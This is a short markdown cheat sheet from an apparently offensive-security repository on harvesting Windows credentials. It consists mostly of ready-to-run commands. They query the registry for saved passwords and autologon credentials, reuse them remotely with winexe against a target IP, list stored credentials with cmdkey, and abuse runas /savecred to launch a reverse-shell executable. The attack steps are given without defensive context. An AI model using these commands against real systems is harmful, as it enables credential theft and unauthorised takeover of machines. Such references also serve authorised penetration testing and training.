whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Windows/Password in Registry.md

26 lines
458 B
Markdown
Raw Blame History

# Password Inside Registry Key
* Query passwords saved inside the registry
```sh
reg query HKLM /f password /t REG_SZ /s
```
* Admin Autologon credentials
```
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
* On attacker, change the credentials on target
```sh
winexe -U 'admin%password' //<target-IP> cmd.exe
```
## List other Creds
```
cmdkey /list
```
* Open reverse shell
```sh
runas /savecred /user:admin C:\shell.exe
```
Reference in New Issue View Git Blame Copy Permalink